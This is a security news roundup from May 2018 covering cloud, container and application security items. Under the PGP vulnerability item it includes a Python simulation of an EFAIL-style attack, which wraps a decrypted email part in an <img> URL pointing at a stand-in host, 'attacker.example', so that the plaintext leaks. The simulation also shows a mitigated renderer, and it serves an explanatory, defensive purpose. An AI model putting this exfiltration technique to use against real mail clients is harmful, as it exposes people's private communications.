A Review of the Best News of the Week on Cloud Security, DevOps, AppSec

The AWS Shared Responsibility Model and GDPR (AWS Security Blog, May 15 2018)
How does the AWS Shared Responsibility Model change under GDPR? The short answer – it doesn’t. AWS is responsible for securing the underlying infrastructure that supports the cloud and the services provided; while customers and APN partners, acting either as data controllers or data processors, are responsible for any personal data they put in the cloud.

Exploring container security: Isolation at different layers of the Kubernetes stack (Google Cloud Platform Blog, May 11 2018)
“To conclude our blog series on container security, today’s post covers isolation, and when containers are appropriate for actually, well… containing. While containers bring great benefits to your development pipeline and provide some resource separation, they were not designed to provide a strong security boundary.”

Details on a New PGP Vulnerability (Schneier on Security, May 14 2018)
Basically, the vulnerability makes use of the fact that modern e-mail programs allow for embedded HTML objects. Essentially, if an attacker can intercept and modify a message in transit, he can insert code that sends the plaintext in a URL to a remote website. Very clever.
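The mechanism described above, as an added illustration that is not code from Schneier's post or from the researchers who reported the flaw: an attacker sandwiches the original encrypted MIME part between two HTML fragments so that a client which decrypts all parts and then renders them as one HTML document ends up putting the plaintext inside the `src` of an image it fetches. The attacker host, the addresses, the message text and the `fake_decrypt` stand-in for real OpenPGP decryption are all constructed for the example; the `safe_client_render` function shows the two behaviours that stop the leak (parse each MIME part on its own, and do not load remote content).

```python
"""Simulation of plaintext exfiltration through an HTML image URL in an
HTML-capable mail client. All hosts, addresses and bodies are constructed."""
import re
from email.mime.multipart import MIMEMultipart
from email.mime.text import MIMEText
from urllib.parse import parse_qs, quote, urlparse

ATTACKER_URL = "https://attacker.example/collect"        # assumed attacker host
SECRET_PLAINTEXT = "Meeting moved to Friday, password is hunter2"  # constructed


def fake_decrypt(body: str) -> str:
    """Stand-in for the client's OpenPGP decryption: anything that looks like
    an armored message 'decrypts' to the constructed secret."""
    if body.startswith("-----BEGIN PGP MESSAGE-----"):
        return SECRET_PLAINTEXT
    return body


def build_tampered_message() -> MIMEMultipart:
    """Message as modified in transit: an unclosed <img> tag, the untouched
    encrypted part, and a part that closes the attribute and tag."""
    msg = MIMEMultipart("mixed")
    msg["From"] = "alice@example.com"
    msg["To"] = "bob@example.com"
    msg["Subject"] = "Re: schedule"
    msg.attach(MIMEText(f'<img src="{ATTACKER_URL}?leak=', "html"))
    msg.attach(MIMEText(
        "-----BEGIN PGP MESSAGE-----\nhQEMA3constructed...\n-----END PGP MESSAGE-----",
        "plain"))
    msg.attach(MIMEText('">', "html"))
    return msg


def _text_parts(msg):
    for part in msg.walk():
        if part.get_content_maintype() == "text":
            yield part, fake_decrypt(part.get_payload(decode=True).decode("utf-8"))


def naive_client_render(msg):
    """Vulnerable behaviour: decrypt every part, concatenate the results, parse
    the whole thing as one HTML document and fetch the image it references.
    Returns the URL the client would request (percent-encoded as a browser would)."""
    document = "".join(text for _, text in _text_parts(msg))
    match = re.search(r'<img src="([^"]*)"', document)
    if not match:
        return None
    return quote(match.group(1), safe=":/?=&")


def leaked_plaintext(url):
    """What the attacker's server reads out of the request."""
    return parse_qs(urlparse(url).query).get("leak", [None])[0]


def safe_client_render(msg, allow_remote_content=False):
    """Mitigated behaviour: each MIME part is decrypted and parsed on its own,
    so attacker-supplied HTML cannot wrap the decrypted text, and decrypted
    text/plain is never interpreted as HTML. Remote loads are off by default.
    Returns the list of image URLs the client would fetch."""
    urls = []
    for part, text in _text_parts(msg):
        if part.get_content_subtype() != "html":
            continue  # plaintext is displayed as text, not parsed as markup
        urls.extend(re.findall(r'<img src="([^"]*)"', text))
    return urls if allow_remote_content else []


if __name__ == "__main__":
    tampered = build_tampered_message()
    url = naive_client_render(tampered)
    print("naive client fetches:", url)
    print("attacker learns:", leaked_plaintext(url))
    print("hardened client fetches:", safe_client_render(tampered))
```

The concatenation step is the whole attack: the encrypted part itself is never broken, the client simply hands the attacker control of the HTML that surrounds the decrypted text. Disabling remote content loading closes the exfiltration channel even if a client still renders parts together, which is why it is the first mitigation most advisories list.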

Calculating Cloud Cost: 8 Factors to Watch (Dark Reading, May 09 2018)
If you’re not careful and don’t regularly assess the impact of your usage, moving to the cloud could have a negative impact on your bottom line.

25% of Businesses Targeted with Cryptojacking in the Cloud (Dark Reading, May 16 2018)
New public cloud security report detects a spike in cryptojacking, mismanaged cloud storage, account takeover, and major patches getting overlooked.

How AWS Meets a Physical Separation Requirement with a Logical Separation Approach (AWS Security Blog, May 09 2018)
…a three-pronged logical separation approach that leverages virtualization, encryption, and deploying compute to dedicated hardware.

Microsoft Makes Bid for IoT Devices with Linux and CASB (IT Pro, May 15 2018)
Microsoft Azure Sphere may provide a way for enterprises to ensure IoT device security deployments through long life cycles.

Containers are here. What about container security? (CSO Online, May 15 2018)
ESG data indicates that cybersecurity pros have problems around the nuances of container technology and implementing container-centric security controls.

Protect virtual machines across different subscriptions with Azure Security Center (Microsoft Azure Blog, May 15 2018)
“We heard from our customers that they wanted an even simpler onboarding experience to Azure Security Center. Today, we are excited to announce the general availability of Azure Security Center’s Cross Subscription Workspace Selection. This capability allows you to collect and monitor data in one location from virtual machines that run in different workspaces, subscriptions, and run queries.”

Smashing Silos and Building Bridges in the IT-Infosec Divide (Dark Reading, May 14 2018)
A strong relationship between IT and security leads to strong defense, but it’s not always easy getting the two to collaborate.

2 million lines of source code left exposed by phone company EE (Naked Security – Sophos, May 14 2018)
EE, which at 30 million customers is the UK’s largest mobile network, was formerly known as Everything Everywhere. Anybody could simply view what should have been private: namely, EE’s Amazon Web Services (AWS) keys, application programming interface (API) keys, and more.

How the Kubernetes Security Response Team Works (eSecurity Planet: Internet Security for IT Professionals, May 16 2018)
In a video interview, Brandon Philips, former CTO of CoreOS, now at Red Hat, and a member of the volunteer team that handles Kubernetes security reports, details how security reports are handled and how the CVE-2017-1002101 issue was managed.

Losses, Not Breaches, Drive AppSec Investment (Infosecurity Magazine, May 09 2018)
A new report looks at the impact that apps running in unsecured environments pose to businesses.

Ready or Not: Transport Layer Security 1.3 Is Coming (Dark Reading, May 10 2018)
Better encryption could mean weaker security if you’re not careful.

Facebook Suspends 200 Apps Over Data Misuse (SecurityWeek, May 14 2018)
Facebook said Monday it has suspended “around 200” apps on its platform as part of an investigation into misuse of private user data.

Taming the Chaos of Application Security: ‘We Built an App for That’ (Dark Reading, May 15 2018)
Want to improve the state of secure software coding? Hide the complexity from developers.

Automating web app testing to secure your environment (Help Net Security, May 15 2018)
…product manager for web application security at Qualys talking about web application security, and specifically about automating some of the testing of web applications, as well as APIs to help secure web applications in your environment.

Deleted Signal Messages Linger on macOS (SecurityWeek, May 15 2018)
Messages from the Signal desktop application for Mac are not deleted from the machine, but are instead copied to the notifications bar, where they persist, a security researcher warns.

Flaws in Open Source Components Pose Increasing Risk to Apps: Study (SecurityWeek, May 15 2018)
Open source components have been increasingly used by developers, but failure to patch vulnerabilities in this type of software can pose serious risks.

The good, the bad & the ugly of using open source code components (CSO Online, May 09 2018)

The developer’s role in securing component use
Open source and third-party component use is shifting from optional to best practice, and even necessary. It’s simply impossible for developers to keep up in today’s digital world without incorporating these pre-fabricated code snippets into their applications. At CA Veracode, we analyze the data from our platform every year to create our State of Software Security report, and we’ve been using this data to sound the alarm about the insecurity of co